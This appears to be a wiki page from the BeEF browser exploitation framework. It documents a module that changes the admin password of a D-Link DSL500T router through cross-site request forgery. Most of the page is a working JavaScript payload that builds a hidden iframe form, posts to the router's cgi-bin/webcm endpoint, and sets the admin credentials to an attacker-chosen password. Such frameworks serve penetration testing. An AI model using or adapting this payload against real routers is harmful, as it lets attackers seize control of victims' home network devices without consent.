-
Notifications
You must be signed in to change notification settings - Fork 2.1k
Module: D Link DSL500T CSRF
Haoxi Tan edited this page Jan 8, 2020
·
2 revisions
-
Objective: Changes the web password on a D-Link DSL500T CSRF
-
Authors: bcoles
-
Browsers: All
uses an iframe with a POST form to change the password of the DSL500T router
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var timeout = 15;
var dsl500t_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST", "application/x-www-form-urlencoded",
[{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} ,
{'type':'hidden', 'name':'security:settings/username', 'value':'admin'},
{'type':'hidden', 'name':'security:settings/password', 'value':passwd},
{'type':'hidden', 'name':'security:settings/password_confirm', 'value':passwd},
{'type':'hidden', 'name':'security:settings/idle_timeout', 'value':'30'}
]);
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK